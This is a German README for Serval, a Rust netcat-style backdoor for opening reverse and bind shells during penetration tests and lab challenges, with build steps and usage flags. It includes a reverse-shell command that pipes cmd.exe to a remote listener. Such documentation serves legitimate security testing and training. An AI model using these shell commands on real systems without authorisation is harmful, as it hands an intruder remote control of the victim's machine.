
Ein Backdoor im Netcat-Stil für Pentesting und Pentest-Übungen.
Serval ist ein leichtgewichtiges, einfach zu verwendendes Binary zum Erstellen von Reverse- und Bind-Shells für Penetrationstests oder Pentest-Übungen. Serval ist plattformübergreifend und kann sowohl für Windows 32 & 64-Bit als auch für Linux 32 und 64-Bit kompiliert werden. Hinweis: Aufgrund der Flexibilität von Rust ist es möglicherweise möglich, für andere Plattformen (wie ARM) zu kompilieren, aber ich habe es für andere Plattformen nicht getestet.
Ich habe Serval entwickelt, um meine Abhängigkeit von Netcat bei HacktheBox-Challenges zu beseitigen, da es mühsam sein kann, Netcat-Binaries für Windows zu finden (insbesondere mit der -e-Option) und es noch schwieriger ist, ein Binary aus einer vertrauenswürdigen Quelle zu finden.
Lade den Quellcode von GitHub herunter.
git clone https://github.com/tgadola/serval.git && cd serval-master
*Optional: Bearbeite die Build-Datei unter .cargo/config, um deinen Build-Pfad anzupassen.
Erstelle das Binary für deine aktuelle Plattform.
cargo build --release
*Hinweis: v1.1.0 erfordert Rust Nightly.
Du kannst für andere Plattformen erstellen mit:
cargo build --release --target <target-triple>
Falls du ein besonders vertrauensseliger Mensch bist, kannst du die vorgefertigten Binaries hier herunterladen.
Standardmäßig lauscht Serval auf einem Port oder verbindet sich mit einem Port und leitet die Standardeingabe und -ausgabe zu dieser Verbindung um. Das Flag -e startet einen Prozess und leitet dessen Standardeingabe und -ausgabe über das Netzwerk.
Serval lauscht auf allen Schnittstellen.
Verwende das Flag -H, um die Zeilenbearbeitungs- und Befehlsverlaufsfunktionen zu aktivieren!
serval -l 4400 -H
serval.exe <listening ip> <listening port> -q -e cmd.exe
Ein großes Dankeschön an @kkawakam-transferwise und ihre Rustyline-Crate, die buchstäblich die ganze schwere Arbeit erledigt. Schau dir Rustyline an!
Danke an die Ersteller und Mitwirkenden von Clap! Schau dir Clap an.
Danke an die Ersteller und Mitwirkenden von Anyhow! Schau dir Anyhow an. +1 für den großartigen Crate-Namen.
Danke an @jaynus für all seine Rust-Ratschläge.
Apache 2.0. Weitere Informationen findest du in der Lizenzdatei.